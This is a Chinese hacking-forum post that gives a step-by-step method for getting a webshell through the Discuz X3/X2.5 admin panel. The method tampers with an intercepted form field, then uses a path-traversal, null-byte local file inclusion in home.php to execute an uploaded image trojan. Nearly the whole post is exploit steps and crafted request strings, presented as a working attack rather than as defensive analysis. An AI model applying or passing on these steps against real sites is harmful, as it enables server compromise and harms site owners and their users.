查看: 13490|回复: 0

dz3.0/2.5 后台拿shell[Discuz 后台拿shell]

[复制链接]
  • TA的每日心情

    2024-12-14 22:22
  • 签到天数: 1631 天

    [LV.Master]伴坛终老

    发表于 2013-8-28 09:41:21 | 显示全部楼层 |阅读模式
    上班后看到wooyun社区发布了一个discuz  x3后台拿shell的方法,随后t00ls的会员也测试了discuz x2.5的后台拿shell方法。
    好蛋疼的是我测试居然没过,抓到的数据包和给出的案例不一样!!!
    经过研究发现,步骤错了。。。。
    原帖地址内容:
    http://zone.wooyun.org/content/3894
    用户 – 用户栏目 – 栏目分组 – 提交 – 抓包 (我就是在这步出错的,一定要提交,不然抓到的数据包不一样)

    1. Content-Disposition: form-data; name="settingnew[profilegroupnew][base][available]"
    复制代码
    改为

    1. Content-Disposition: form-data; name="settingnew[profilegroupnew][plugin][available]"
    复制代码
    访问

    1. /home.php?mod=spacecp&id=../../robots.txt%0057
    复制代码
    利用:
    原帖测试的是dz x3,我测试的是dz x2.5  无视gpc
    *********************************************************************
    1.首先进后台,抓个包
    2013052411300201.jpg
    2.改包

    1. Content-Disposition: form-data; name="settingnew[profilegroupnew][base][available]"
    复制代码
    改为

    1. Content-Disposition: form-data; name="settingnew[profilegroupnew][plugin][available]"
    复制代码
    提交
    2013052411514402.jpg
    3.提交过后访问
    1. /home.php?mod=spacecp&id=../../robots.txt%00
    复制代码
    2013052411523903.jpg
    4.找个地方上传图片马
    2013052412221104.jpg
    5.访问图片马
    1. http://192.168.2.190//home.php?mod=spacecp&id=../../data/attachment/forum/201305/24/122111m1464cdtfkc0stt1.gif%00
    复制代码
    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-28 11:31 , Processed in 0.020806 second(s), 14 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部